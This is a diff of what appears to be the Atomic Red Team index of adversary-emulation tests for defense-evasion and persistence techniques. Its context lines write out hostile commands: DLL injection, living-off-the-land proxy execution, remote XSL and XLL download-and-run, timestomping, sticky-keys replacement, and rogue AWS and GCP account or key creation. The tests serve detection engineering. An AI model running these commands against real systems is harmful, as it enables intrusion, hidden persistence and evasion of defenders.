@@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} -' + ' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" -' + ' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB -' + ' supported_platforms: - windows input_arguments: 
@@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} -' + ' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} -' + ' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. -' + ' supported_platforms: - windows input_arguments: 
@@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided -' + ' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." -' + ' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." -' + ' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt -' + ' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" -' + ' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
@@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" -' + ' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. -' + ' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe -' + ' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename -' + ' supported_platforms: - macos executor: 
@@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. -' + ' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system 
@@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} -' + ' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} -' + ' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 
@@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 
@@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" -' + ' - description: 'kxwn.lock must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File -' + ' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) -' + ' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r -' + ' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F -' + ' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 
@@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s -' + ' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 -' + ' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) -' + ' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 -' + ' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1220: 
@@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) -' + ' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) -' + ' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 
@@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. -' + ' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) -' + ' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" -' + ' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" -' + ' name: command_prompt persistence: T1546.008: 
@@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss -' + ' supported_platforms: - iaas:aws input_arguments: 
@@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test -' + ' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" -' + ' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic -' + ' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds 
@@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: 
@@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time -' + ' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: 'cat ~/.aws/credentials | grep "default" -' + ' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: 'aws iam create-user --user-name #{username} -' + ' cleanup_command: 'aws iam delete-user --user-name #{username} -' + ' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: 
